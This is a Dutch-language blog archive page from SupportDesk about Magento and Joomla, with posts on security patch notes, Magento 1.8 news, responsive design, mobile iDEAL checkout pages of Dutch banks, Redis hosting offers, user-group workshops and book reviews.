    • Aangepaste cron.php voor windows gebruikers

     

    Magento Security verbetering [upgrade aanbevolen]

    • Fouten worden niet weergegeven in een nieuwe Magento installatie
    • De session fixation kwetsbaarheid, tijdens het aanmaken van een nieuwe gebruiker, is opgelost. Aanvallers kunnen niet langer misbruik maken van dit lek en nieuwe gebruikersaccounts overnemen tijdens dit proces
    • Het voorkomen van het verwijderen van een Magento installatie door een gebruiker met beperkte rechten
    • Het voorkomen van aanvallen die gebruikmaken van OAuth om gevoelige informatie naar aanvallers uit te lekken die de consumer key en de user token kennen
    • Het probleem dat aanvallers toegang krijgen tot factureringsgegevens is opgelost
    • Diverse problemen met de beveiliging van OAuth tokens en sleutels zijn opgelost
    • Een beveiligingslek waardoor externe code kan worden uitgevoerd is opgelost
    • De Magento Admin Panel en web winkels zullen niet langer toestaan dat webbrowsers gebruikersnamen of wachtwoorden opslaan
    • De Magento webwinkel heeft extra Cross Site Request Forgery (CSRF) beveiligingen, wat betekent dat een bedrieger zich niet meer kan voordoen als een nieuw geregistreerde klant en acties uitvoeren namens de klant
    • De cryptografische methoden gebruikt om wachtwoorden op te slaan zijn verbeterd voor een betere beveiliging
    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento SEO workshop 30 augustus 2013 Recap

    blogseoworkshoprecapHet was me een waar genoegen om deze dag samen met de deelnemers en de sprekers tot een leerzame en succesvolle dag te brengen. Het was een zeer leerzame middag met zeer interessante presentaties van Sander Lems (ism eCompany), Hans Kuijpers (Byte + HKweb) en Erik van Rijn (SupportDesk + Gudz.nl). Met als afsluiting een gezellige boottocht met bbq over de Amsterdamse grachten.

    De workshop presentaties

    Presentatie 1: Sander Lems - Magento & Online Marketing

    Wilt u maximaal rendement halen uit uw Magento webshop of denkt u hier wellicht mee te gaan werken? Magento biedt een goed fundament voor een succesvolle webwinkel. Om uw potentiële klanten online met uw producten in aanraking te laten komen dient uw productaanbod maximaal zichtbaar te zijn. Hoe u dit doet? Sander Lems geeft inzicht in de redenen waarom hij graag met Magento werkt. U ontdekt tevens welke Magento extensies u moet kennen om optimaal gebruik te maken van de online marketing mogelijkheden van Magento.

    Wil je bovenstaande presentie downloaden, ga naar deze pagina. Deze download is beschikbaar t/m 16 september.

    Presentatie 2: Hans Kuijpers - Rich Snippets

    Wilt u met uw producten meer opvallen in de zoekresultaten van Google en andere zoekmachines? Hans Kuijpers laat zien hoe je dit implementeert voor de productpagina’s van je eigen Magento webshop.

    Presentatie 3: Erik van Rijn - Adwords/Dynamic Remarketing

    Een korte presentatie over de werking van Google Adwords Dynamics Remarketing in combinatie met Magento, zoals gezegd tijdens de presentatie bevind de plugin zich in Beta status, test de plugin en ik hoor graag wat de ervaringen zijn!

    Afsluiting van de Magento SEO Workshop

    Na een leerzame dag is niets fijner dan het gezellig af te sluiten met elkaar. Wat is er beter dan samen een boottochtje te maken over de Amsterdamse grachten. De boot was rijkelijk gevuld met een heerlijke bbq en lekkere drankjes. Zodoende konden we in het zonnetje nakletsen over de workshops van die dag en elkaar nog beter leren kennen. Varend langs o.a. Artis en de mooiste gracht van Amsterdam (Prinsengracht) met een heerlijk achtergrond muziekje was het een perfecte dag.

    Wil je de foto's zien? Ga dan naar deze Meetup pagina.

    Waar kan ik me inschrijven voor de volgende MUG?

    Ga naar deze Magento Competence Center pagina en schrijf je in voor de volgende Magento User Group. Deze is op donderavond 26 september, en heeft als onderwerp: Beheers je Magento backoffice. Dit is weer een normale Magento User Group die plaats zal vinden op de Ruyterkade.

    Wij zien je met veel plezier in de Magento Competence Center te Amsterdam.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

     

     

  • Magento 1.8 beschikbaar eind september

    Afgelopen week hebben de leden van het Magento 1.x community team een meeting georganiseerd om de doelstellingen en vooruitgang van Magento 1.8 te bespreken.

    Deze sessie was georganiseerd door Mossen Akizian en werd gesteund door Magento (Ebay) met Piotr Kaminski (de productmanager van 1.x), Lin Shearer en Shanon Hane. Community bijdragen waren van: Brent Peterson, Ben Marks, David Shuford, Kris Brown, Sherrie Rohde, Kimberely Thomas, Sylvain Raye , en Tom Robertshaw.

    Magento 1.8 beschikbaar eind September

    Na de Magento 1.8 alfa versie, welke afgelopen april aangekondigd werd tijdens het Magento Imagine congres, is er weinig nieuws uit het Magento kamp gemeld. Maar hier komt nu verandering in met de aankondiging van de Magento 1.8 Stable release eind September. De aanpassing voor unieke SEF-URL's op database niveau gaan de Magento 1.8 release helaas nog niet halen, deze zullen naar alle waarschijnlijkheid opgenomen worden in Magento 1.8.1, welke eind Q4 beschikbaar zijn. Het afrondings probleem met BTW en vele andere reeds gemelde bugs komen wel in de Magento 1.8 Stable Release. De laatste release notes omtrent Magento 1.8 vind je hier.

    Tevens zal de Magento 1.8.1 release vele bug fixes welke gevonden zijn tijdens de Bugathons bevatten. Samengevat zullen in de Magento 1.8 en 1.8.1 veelal bugfixes, security issues, BTW en betaalondersteuning opgelost worden.

    Update: Onlangs is bevestigd op twitter door Piotr (productmanager Magento) dat de aangepast URL's niet in de Magento 1.8 Stable release zal komen. Daar en tegen zal Redis caching in Magento 1.8 nu wel standaard beschibaar zijn.

    Magento 2.0

    Nieuws omtrent Magento 2.0 is er de afgelopen maanden weinig. Dit is de eerst update sinds 5 maanden. Gezien de zeer lange lijst op Github is het duidelijk dat men de afgelopen maanden niet stil heeft gezeten. In totaal zijn er 5,889 gewijzigingen doorgevoerd met 171,404 aanpassingen en 145,136 verwijderden bestanden. 

    Magento 2.0

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Responsive design voor Magento of Joomla!

    Magento & Joomla! Responsive webdesign

    Het kan je als Magento of Joomla! webdesigner waarschijnlijk niet ontgaan zijn: responsive design. Is het een nieuw buzzwoord? Maar wat betekent het precies, en wat zijn de consequenties ervan voor jouw Magento of Joomla website of webshop?

    De desktop of laptop is allang niet meer het enige apparaat waarmee we over het web surfen. Ook smartphones, feature phones en tablets lenen zich hier uitstekend voor. Maar websites zijn veelal ontworpen met een 'normale' pc in gedachte. Een breedte van je website van 980 pixels of meer is eerder regel dan uitzondering. Niet zo vreemd, moderne breedbeeldmonitoren kunnen deze gemakkelijk en zonder problemen weergeven.

    Maar op je smartphones, feature phones of tablets is dat wellicht een ander verhaal. Deze schermen zijn veel kleiner en hebben soms moeite met het goed en leesbaar weergeven van een website. In dat geval kan 'responsive design' een mogelijke oplossing.

    Wat houdt het precies in? Een website die ontworpen is volgens de principes van responsive design heeft altijd dezelfde html-code en url-structuur, ongeacht of je deze bezoekt vanaf een laptop, desktop, tablet of smartphone. Maar de html, css en javascript code past zich aan het bezoekende platform aan. Bezoek je een website met je smartphone, dan krijg je een ander design voorgeschoteld dan wanneer je deze op een normale computer zou bezoeken, terwijl de rest van de techniek exact gelijk is.

    Wanneer kies ik nu voor responsive webdesign?

    Wanneer moet je je Joomla! website of Magento webshop nou voorzien van responsive design? Daar zijn de meningen over verdeeld. Een logisch geval zou zijn wanneer jouw website erg onleesbaar of onbruikbaar wordt op kleinere (aanraak)schermen. Bijvoorbeeld omdat je website een klein font gebruikt, of je menu-items relatief krap vormgegeven zijn. Of omdat jouw website op een mobiel of tablet erg veel scrollen zou vereisen. In die gevallen kan het lonen voor specifieke schermformaten een specifieke vormgeving aan te bieden. De vormgeving kun je immers helemaal afstemmen op een kleiner scherm en bovendien rekening houden met aanraakbediening.

    Ook biedt responsive design, in tegenstelling tot een compleet mobiele website, een ander voordeel: je hebt maar een url. Die eenduidigheid verhoogt de herkenbaarheid bij de bezoeker. Ook worden bezoekers niet omgeleid. Een ander voordeel: bots en crawlers hoeven maar één website door. Voor hen is de css immers niet relevant, zij spitten alleen je html door en die blijft gewoon hetzelfde. Je hoeft de SEO-authoriteit van je normale pagina niet met allerlei trucs te koppelen aan die van je mobiele pagina of website, want je biedt immers maar één pagina of website aan.

    Nadelen responsive webdesign

    Toch is niet iedereen voorstander van responsive webdesign. Zo zeggen kritische experts dat het je bezoeker kan verwarren, omdat de website er anders uitziet dan hij of zij verwacht. En het laatste wat je wil is afwijken van de verwachting van je bezoekers. Zijn ze gewend aan je website zoals het wordt weergegeven op de desktop, dan gooi je met responsive design die gewenning in één keer overboord.

    Een ander aspect is de kwaliteit van mobiele browsers. Moderne mobiele browsers bieden tal van mogelijkheden om de weergave van een 'niet-geoptimaliseerde' website toch prima te bekijken. Denk aan pinch-to-zoom, denk aan een automatisch vergroten van kleine elementen, denk aan een dubbel-tap om in te zoomen op een bepaald deel van de site. Gebruikers zijn hiermee inmiddels zo vertrouwd dat je je kunt afvragen of een apart design voor kleine schermen nog echt nodig is.

    Bedenk ook dat de implementatie van een responsive design linksom of rechtsom niet gratis is. Het kost tijd, en dit vertaalt zich meestal in een hogere factuur van je websitebouwer. In het gunstigste geval kun je het zelf, maar ook dan kost het je jouw kostbare tijd. Aan de andere kant is het doorvoeren van een responsive design minder werk dan het bouwen van een complete mobiele versie van je website. Alleen de css hoeft immers verbouwd te worden.

    Het loont in ieder geval de moeite eerst te kijken of jouw website überhaupt veel bezocht wordt via mobiele apparaten. Website-statistieken als Google Analytics bieden daar een eenduidig antwoord op. Bedenk wel dat de lage bezoekcijfers vanaf mobiele apparaten ook juist het gevolg kunnen zijn van het ontbreken van een responsive design. Als jouw website erg ontoegankelijk is op een klein scherm, is het wellicht niet zo vreemd dat je vanaf die apparaten weinig bezoek trekt.

    Een van de onbekendste nadelen van responsive design is mobile webperformance. Bij reponsive webdesign worden namelijk nog steeds alle css, html en javascript bestanden ingelezen die op een desktop of tablet ook gebruikt worden. Maar aangezien een smartphone of feature phone veel minder "power" heeft dan een desktop zal de laattijd van een reponsive design vaak trager zijn dan bijv. al bij "Dynamische serving" ook wel "Webapp" genoemd. Deze performance heeft dan weer een negatief effect op de gebruikers ervaring en ranking in zoekmachines.

    Geen "gouden ei" oplossing

    Responsive design is geen gouden ie oplossing voor het aanbieden van een mobiele site. Het houdt alleen in dat de css zich aanpast aan het medium, maar de functionaliteit van je website verandert niet. Wil je voor je mobiele bezoeker specifieke functionaliteit aanbieden of juist onthouden (denk in dat laatste geval bijvoorbeeld aan een print-functie), dan gaat responsive design niet ver genoeg. In die gevallen kun je beter een complete mobiele site aanbieden, waarbij bijvoorbeeld ook een andere html-code wordt aangeboden. Ook een app behoort dan tot de betere alternatieven. Bij die laatste heb je een aantal extra mogelijkheden, zoals het gebruikmaken van locatiegegevens via de gps-chip.

    Bedenk ook dat een responsive design niet door gebruikers over de hele wereld even goed wordt opgepikt. In minder ontwikkelde landen zijn 'feature phones' nog standaard, en die kunnen met hun browsers (in veel gevallen Opera) niet overweg met responsive design.

    Ander kritiekpunt is de snelheid van je website. Een site die helemaal geoptimaliseerd is voor mobiel is vaak sneller dan responsive design, dat alleen een ander design presenteert.

    Mobile SEO

    Heeft responsive design effect op de vindbaarheid bij zoekmachines, oftewel op de SEO-waarde van je website? Op die vraag is moeilijk een eenduidig antwoord te geven. Google zegt in een officieel statement dat het een positief effect heeft, mits een responsive design 'de juiste oplossing voor je gebruiker is'. Die omschrijving is natuurlijk behoorlijk cryptisch en biedt geen garantie dat responsive design in jouw geval voor een betere SEO-waarde gaat zorgen.

    Alternatieven voor responsive design

    Responsive design zorgt voor een geoptimaliseerde vormgeving van je website op mobiele apparaten. Maar er zijn meer oplossingen mogelijk voor Joomla! of Magento.

    Een 'dedicated' mobiele website

    In dit geval wordt je sitebezoeker omgeleid naar een mobiele versie van je website. Deze staat in principe los van je hoofdwebsite, en heeft vaak een url als m.jouwsite.nl. Je biedt dus andere html en css aan, en hebt dus ook de mogelijkheid om andere functionaliteit aan te bieden.

    Dynamic serving

    In dit geval blijft je url gelijk, maar kun je wel andere html aanbieden. De server herkent het type apparaat dat je website bezoekt en past daar zowel de css als de html op aan. Ook bij deze variant heb je dus de mogelijkheid op verschillende platforms verschillende functionaliteit en content aan te bieden. 

    Een app

    Dit is de meest verregaande vorm. Hierbij draait jouw website in de vorm van een app op het platform van de gebruiker. Je kunt niet alleen specifieke functionaliteit en content aanbieden, maar ook gebruikmaken van hardwarefuncties van het betreffende apparaat, zoals bluetooth of gps.

    Conclusie

    Responsive design mag dan het zoveelste buzzwoord zijn in internetland, bedenk goed of het wel voor jouw website de meest geschikte keuze is. De voordelen zijn evident en de technologie past in het huidige mobiele tijdperk, maar de nadelen en de investering die het vergt kunnen zwaarder wegen en de balans naar de andere kant doen uitslaan.

    Een ding staat als een paal boven water: in een tijd waarin de desktop allang niet meer zaligmakend is, ontkom je er niet aan goed na te denken over de vormgeving en bruikbaarheid van jouw website op andere media dan een 23-inch breedbeeldmonitor.

    Bronnen: 

    http://www.winmagpro.nl/content/responsive-design-de-voors-en-tegens

    http://www.supportdesk.nu/blog/99-magento-mobile-performance-the-responsive-mythes

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Banken nog niet klaar voor mobile website checkout

    Tijdens een recent onderzoek is gebleken dat 7 van de 10 Banken geen klantvriendelijk webpagina hebben tijdens de checkout. De overige 3 banken boden de klant een iDEAL betaal pagina die zeer klantvriendelijk was en het checkout process vereenvoudigde.

    ING de grote winnaar

    De ING bank was de enige in het onderzoek die met kop en schouder boven iedereen uit stak. De gebruikersvriendelijkheid, overduidelijk kleur gebruik maakte alles zeer overzichtelijk. ABN AMRO en KNAB waren de overige banken die duidelijk die nieuwe webtechnieken zoals responsive design duidelijk op de juiste manier hebben toegepast. Alle 3 de banken maken standaard  gebruik van een responsive layout in hun code.

    De Rabobank, SNS Bank, Friesland Bank, ASN Bank, SNS Regio Bank, Triodios Bank en Van Lanschot Bankiers maakte standaard geen gebruik van een mobile variant van hun betaal pagina. In sommige gevallen was het niet eens mogelijk om op een Iphone of Andriod de bestelling te annuleren vanwege een popup scherm welke op een mobile browser maar amper zichtbaar is.

    Magento Mobile Checkout

    Mobile checkout Condoom AnoniemDeze test was onderdeel van end-to-end test wat betreft de mobile optie voor Magento icm payment provider Multisafepay. Standaard is Magento niet mobile geoptimaliseerd. Middels een reponsive magento theme of optimized dedicated Mobile "webapp" (HTML5 high performance optimized theme + RESS) zijn de opties eindeloos.

    De oplossing die voor onze klant Condoom Anoniem gekozen is, is de "webapp" die via hetzelfde domeinnaam beschikbaar is (http://www.condoom-anoniem.nl/). Middels browser en device detectie wordt bepaald welke Magento website de klant voorgeschoteld krijgt. Middels deze keuze is het namelijk zeer eenvoudig om in magento de mobile setting te tunen. Denk bijv. aan het uitzetten van Onestepcheckout of aanmaken van een custom Multisafepay website account. 

    De Magento mobile checkout van de "webapp" is afgestemd op de gebruiker en kan middels simpele stappen direct zijn order plaatsen. Middels een aangepast reponsive theme layout van Multisafepay komt de gebruiker terecht in een overzichtelijk scherm met de iDeal keuzen van zijn eigen Bank.

    Mobile ING Mobile ABN AMRO Mobile KNAB Mobile ASN Mobile Friesland Bank Mobile Rabobank Mobile ABN SNS Bank Mobile SNS Regio Bank Mobile Tridios Bank Mobile van Lanschot Bankiers

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento SEO workshop 30 augustus 2013

    Helaas, de workshop is uitverkocht

    Helaas, we zijn uitverkocht. Wil je de volgende keer graag meedoen? Stuur een e-mail naar support[at]supportdesk.nu en laat ons weten dat je interesse hebt voor een tweede event. We houden je graag op de hoogte voor toekomstige Magento User Group evenementen.

    Magento SEO workshop 30 augustus Amsterdam

    Het programma

    Download het Magento SEO Workshop Programma [jpg].

    Kosten & aanmelden

    Kosten: € 90,- p.p. (incl BBQ-boottocht in de Amsterdamse grachten).

    Aanmelden: Koop je ticket via de SupportDesk Shop (iDEAL).
    RSVP ook nog via Meetup.com.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

     

     

  • Geoptimaliseerde Magento Jira Image Versie 6 + Redis + Magento APK

    De belangrijkste wijziging in het geoptimaliseerde Magento Jira Image versie 6 gemaakt voor CloudVPS is het inzetten van PHP 5.4, die 25% extra snelheid oplevert. Daarnaast is er ook nu default Redis voor Magento beschikbaar. Met de komst van PHP 5.4 zijn caching methodes, zoals Memcache en APC, die in Versie 5 beschikbaar waren, niet meer beschikbaar en achterhaald. Memcache is nl. ook een key-value storage mechanisme, maar werkt minder efficiënt dan Redis.

    Redis caching

    image redis

    Redis genereert hierbij een extra performance boost om zowel de gecachede waarden (de key values) als belangrijke metadata (de tags) in het geheugen op te slaan. Ook de sessies worden opgeslagen in een losse versie van Redis. Tevens zal de data van Redis opgeslagen worden op disk welke een reboot mogelijk maakt met behoud van de cache.

    Instellen Redis caching

    Het instellen van deze caching kan gedaan worden met behulp van de plugins en uitleg die te vinden is op github.com. Mocht dit allemaal iets te ingewikkeld klinken, dan is SupportDesk in staat om deze cache voor u te verzorgen. SupportDesk zal namelijk na oplevering een gratis Basic Redis installatie uitvoeren t.w.v. 1 uur = €100,- op de CloudVPS Jira V6! Deze kun je aanvragen door een e-mail te sturen naar support[at]cloudvps.nl. Je krijgt vervolgens een referentienummer die wij nodig hebben.

    Additionele caching zaken

    Indien gewenst kan SupportDesk de Redis setup helemaal perfectioneren, door de volgende zaken uit te voeren:

    • Full page Cache
    • Redis Cache warmup
    • Redis custom hole punching
    • Redis magento session install
    • Redis Monitor

    Ga naar de SupportDesk shop voor meer info en om direct te bestellen.

    Magento APK

    Supportdesk Magento APK

    Voor een uitgebreide doorlichting van je shop kunnen we nu ook de Magento APK aanbieden voor een gereduceerd tarief. Deze APK doorloopt de shop op zeven hoofdpunten. Klik op het plaatje (hier rechts) en zie een Magento APK voorbeeld.

    • Security Audit
    • Hosting Check
    • Mobile First
    • Transactionele Email
    • Website Performance Check
    • Search Engine Optimization
    • Advies Backup en 'Failover'

    Voordelige Magento APK in combinatie met Jira V6 image

    image redis apk

    De Magento APK met een waarde van €250,- kunnen we aanbieden, i.c.m. met de Jira V6 image voor slechts €100,-. Ga naar de SupportDesk shop en vraag deze aanbeiding aan. De kortingscoupon code kun je aanvragen door een e-mail te sturen naar support[at]supportdesk.nu

     

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • High Security Joomla release voor 1.5.x, 2.5.x en 3.0.x

    security release

    Het Joomla project heeft vandaag een nieuwe High Joomla Security release vrijgegeven voor alle versies, nl. Joomla 1.5.x, Joomla 2.5.x en Joomla 3.0.x.

    Voor Joomla 1.5 is enkel een patch file uitgebracht.

    Highlight in de Joomla 3.1.5

    • 1 high security fix
    • 7 bugs gefixed

    Highlight in de Joomla 2.5.14

    • 1 high security fix
    • 1 bug opgelost

    Meer weten welke issues gefixed zijn, kijk dan op de Joomla website.

    Hulp nodig bij pathen? Bel of mail ons.

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Jira image V6 [Magento Optimized]

    jira-image-v6De nieuwste versie van het Jira image, V6 is beschikbaar bij CloudVPS!
    Deze VPS image is alweer de 6e release in ruim 2,5 jaar tijd en ook nu weer voorzien van de laatste optimalisatie-aanpassingen voor zowel Magento als Joomla!.

    De basis van deze V6 release is gebaseerd op:
    - Centos 6.4
    - Directadmin
    - Apache 2.2.x
    - PHP 5.4.x
    - Mysql 5.5.x
    - Redis server 2.6.x
    - New Relic

    De complete changelog bevindt zich in de "root" directory van de VPS.

    Magento Redis en New Relic

    Naast de vele tweaks in de VPS zijn na uitvoerige testen van bijna een jaar, zowel Redis als New Relic standaard beschikbaar in deze release.
    Redis is vooral bedoeld voor een extra performance boost om zowel de cache als sessions in Magento op te slaan. Standaard zijn er dan ook 2 Redis servers aanwezig zodat deze onafhankelijk van elkaar gebruikt en beheerd kunnen worden.

    New Relic is een advanced performance/analyse tool, die uitgebreid inzicht geeft in de PHP details van een Magento website, eventuele "SQL slow queries" en de server performance details. New Relic is eigenlijk een must voor iedereen die zijn shop of site technisch onder de loep wil leggen.
    Om New Relic goed te kunnen gebruiken is wel enige kennis vereist.
    New Relic is de eerste 2 weken gratis te gebruiken, daarna kun je zelf aangeven welk pakket het beste bij je past. Voor een juiste (historische) analyse icm Magento is de "Full" version aan te raden.

    magento-speed.com

    Onze demo website http://www.magento-speed.com/ is naast de VPS image v6 basis ook voorzien van Full Page Caching (FPC) voor Magento in combinatie met Redis. Kijk zelf maar eens wat de snelheden zijn!

    magento-speed-pingdom


    Magento High Performance Mobile

    Aangezien Magento mobile sinds het begin van 2008 standaard aanwezig was, is deze nooit verder echt geoptimaliseerd voor de huidige webstandaarden en Magento gerelateerde toepassingen icm de huidige vele verschillende mobile browsers. De huidige image en custom aanpassingen in Magento laten zien dat performance ook voor mobile een must is.
    Onlangs presenteerde Ray Bogman tijdens de Magento User Groups Amsterdam zijn bevindingen genaamd: "Magento Mobile Performance: The Reponsive Myths".

    magento-speed-mobile

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Mobile Performance - The Responsive Mythes

    mug27juniOp donderdag 27 Juni was het onderwerp van de MUG "Responsive Myths". Er waren maar liefst 20 Muggers aanwezig en na een korte introductie ronde werd er eerst een korte presentatie gegeven door Daniel Genis van Byte Internet. Vervolgens gaf Ray Bogman een interactieve presentatie over de mythes van het responsive design en de relatie met Magento shops.

    Magento Mobile Performance

    Wat wordt er verstaan onder een goede mobiele prestatie en is dit mogelijk in combinatie met Magento? Hieronder een to do lijst wat in de bovenstaande Prezi van Ray Bogman tijdens de Magento User Group aan bod is gekomen:

    • Minimaliseren http request
    • Deflate content
    • Merge css/js
    • Expire data
    • Gebruik Mobile doctype
    • Local storage in browser van je mobiel
    • Gebruik plaatjes alleen voor het hoofdnoodzakelijke (zoals o.a. logo's en artikelen)
    • Plaatje optimaliseren met het gebruik van data URI's
    • Oppassen met typefonts (weet wat je mogelijkheden en beperkingen hiermee zijn)
    • Cache manifest bestand
    • Test je mobiele website (meten is weten)

    Zie ook het Byte blog.

    Waar kan ik me inschrijven voor de volgende MUG?

    Ga naar deze Magento Competence Center pagina en schrijf je in voor de volgende Magento User Group. Dit zal niet zomaar een MUG zijn, maar een heuse Magento SEO workshop. Lees meer hierover op de Magento User Group Amsterdam Meetup pagina. Normale ticketprijs is € 90,- Maar t/m 31 juli hebben we een early bird ticketprijs van € 75,-.

    Koop hier je Magento workshop kaartje en leer alles over Magento SEO.

    Wij zien je met veel plezier in de Magento Competence Center te Amsterdam.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

     

     

  • Joomla! 3 - Het Beginnersboek

    Joomla 3 Het BeginnersboekOnlangs verscheen er een nieuw Joomla boek gepubliceerd door Packtpub genaamd: Joomla 3 Beginnner's Guide. Het boek geschreven door Erik Tiggeler en is een "must read" voor elke Joomla! liefhebber.

    Joomla! 3

    Joomla! 3.0 is de eerste LTS (Long Term Release) versie van de Joomla 3 reeks. De volgende LTS zal Joomla 3.5 genoemd worden en verschijnt eind 2013. Joomla 3.0 geeft je dan ook een kijkje in de keuken wat er allemaal gaat komen en zal veranderen.

    Het Joomla 3.0 Beginner's boek is dan ook vooral bedoeld voor nieuwe gebruikers of Joomla freaks die graag een overzicht hebben wat er allemaal veranderd is.

    Het boek gaat in op de volgende zaken:

    • Algemene introductie
    • Installatie
    • Stap 1: Leer Joomla! kennen
    • Maak een basis website binnen 1 uur
    • Kleine of grote website: maak je content effectief
    • Maak "killer" content: toevoegen of aanpassen van content
    • Heet je bezoekers welkom, maak een goede homepage
    • Aanmaken van menu's
    • Gebruikers beheer (rollen, rechten, beheren)
    • Componenten, Modules, Plugins, verrijk je website
    • Maak een aantrekkelijk Joomla template
    • Joomla SEO tips en adviezen
    • Behoud een veilige Joomla website
    • Maak een meertalige Joomla website
    • Mijn eerste Joomla website

    Ben je nieuw in de wereld van Joomla dan geeft dit boek je een goed beeld wat er mogelijk is maar ook de handvaten om direct te bouwen en een eigen website te maken.
    Zaken zoals Joomla template, Joomla SEO, Joomla Security komen in de basis voldoende aan bod. Indien je de smaak te pakken krijgt zijn er gelukkig genoeg boeken of Joomla trainingen beschikbaar om je bij te spijkeren naar een advanced niveau.

    joomla coffee machine

    A CMS is like a Coffee Machine system

    In a way, a CMS functions just like those big multi-option coffee machines used in office environments—although the quality of the output of a CMS is incomparably better! 
    However, the same principles apply:
    the user presses a button to select any of the available options; the machine invisibly fetches all of the required ingredients and mixes these to serve a cup of fresh coffee, latte, frappuccino, or decaf.
    This is similar to the way a CMS serves content. As the site visitor clicks on a link, the mighty machine gathers whatever combination of content parts is needed from the database to complete this particular order and it pours the output into a coffee cup—sorry, a web page.

     

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento Redis Optimization: How To

    Magento Redis Optimization: How ToOnlangs heeft Packtpub een boek gepubliceerd met als titel: Redis Optimization How To. Het boek geschreven door Arun Chinnachamy geeft een goed overzicht wat er komt kijken bij een juiste implementatie van Redis.
    Redis is een Key-Value-Storage memory database welke vele voordelen biedt voor het versnellen van een website maar ook efficient grote brokken data beschikbaar stelt (big data).

    De volgende zaken worden redelijk tot uitgebreid in het boek behandeld:

    • Data store keuze (beginner)
    • Installatie van Redis (beginner)
    • Configuratie en tuning van Redis (halfgevorderd)
    • Implementatie van constante verbinding in Redis (halfgevorderd)
    • Debuggen performance bottlenecks Redis (halfgevorderd)
    • Performing high-volume writes (gevorderd)
    • Leverage datatypes (beginner)
    • Geheugen optimalisatie (halfgevorderd)
    • Transacties Pub/Sub (gevorderd)
    • Debuggen en monitoring (halfgevorderd)
    • Programmeertalen en client drivers (beginner)

    Redis server of cluster

    Aangezien Redis een redelijk flexibel systeem is, is deze geschikt in zowel kleine als grote systeemoplossingen. De keuze voor een kleine enkele Redis database als onderdeel van een Redis server omgeving is voor de hand liggend. Maar een Redis cluster setup zoals master/slave of master/master zijn zeer zeker op termijn mogelijk in een doorgroei pad. Aangezien Redis zijn data naast het realtime geheugengebruik ook opslaat op disk is het mogelijk deze over te zetten naar een groter Redis omgeving indien dit gewenst is. Dankzij deze techniek is een reboot van een memory-based key-value-storage database altijd fullproof.

    Magento Redis

    De voordelen van Redis voor Magento zijn enorm aangezien zowel de cache backend als de Magento sessies volledig in een Redis database kunnen draaien. Voor Magento betekent dit dat er geen gebruik meer gemaakt hoeft te worden van file (tmpfs) of memcache achtige oplossingen.
    Deze cache zal dan realtime in het geheugen van de Redis server beschikbaar zijn. Het opwarmen van deze cache kan een extra performance winst met zich meebrengen aangezien klanten dan direct een gecachte pagina ter beschikking hebben.

    Magento Enterprise Redis

    Magento Enterprise is vanaf versie 1.13.0 en hoger standaard uitgerust met de open source Magento Redis module van Colin Mollenhour. Deze module is reeds verouderd en kan beter geupdate worden. Tevens ondersteund de Magento Enterprise standaard Magento session in Redis.

    Magento Full Page Cache voor Redis

    Om Magento nog een extra Boost te geven is het gebruik van een Full Page Cache (FPC) een aan te raden aanvulling. Uit testresultaten blijkt een totale performance winst van 500 - 800 ms per pagina.
    Enkele voorbeelden zijn:

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento User Group: Magento mobile - responsive mythes

    Magento User GroupZoals je in het vorige blog hebt kunnen lezen zijn de Magento User Group data bekend. De komende maanden zijn er weer een aantal leuke MUGs op de agenda geplaatst, waaronder de eerstvolgende op donderdagavond 27 juni aanstaande. Deze zal gaan over: Magento Mobile - Responsive mythes.

    Optimaliseren van Magento responsive websites

    Magento User GroupAfgelopen jaren is Website Performance Optimization (WPO) een steeds belangrijker feit geworden. Elke Magento website moet sneller en sneller worden. Wanneer we de Magento website via een mobiele browser bekijken, willen we dat deze op onze smartphone en/of tablet ook snel te bekijken is. Met de komst van Responsive Webdesign denken we het "gouden ei" gevonden te hebben, maar dit is niet zo. Mobile Performance Optimization is namelijk een verdiepingsslag in de performance wereld.

    Het belang van een snelle mobiele Magento site

    In het plaatje hieronder wordt uitgelegd m.b.v. percentage diagrammen, dat elke seconde telt, wat de verwachtingen van de bezoeker op een mobiel apparaat vs. desktop zijn, de veel voorkomende problemen bij het openen van een website op een mobiele telefoon (en het geduld hierbij) en hoe de prestatie van de website het shopgedrag beïnvloedt.

    Ben jij ook op zoek naar mogelijkheden om je Magento webshop mobiel te maken? Dan is het nu de gelegenheid om hierover mee te discussiëren op deze MUG.

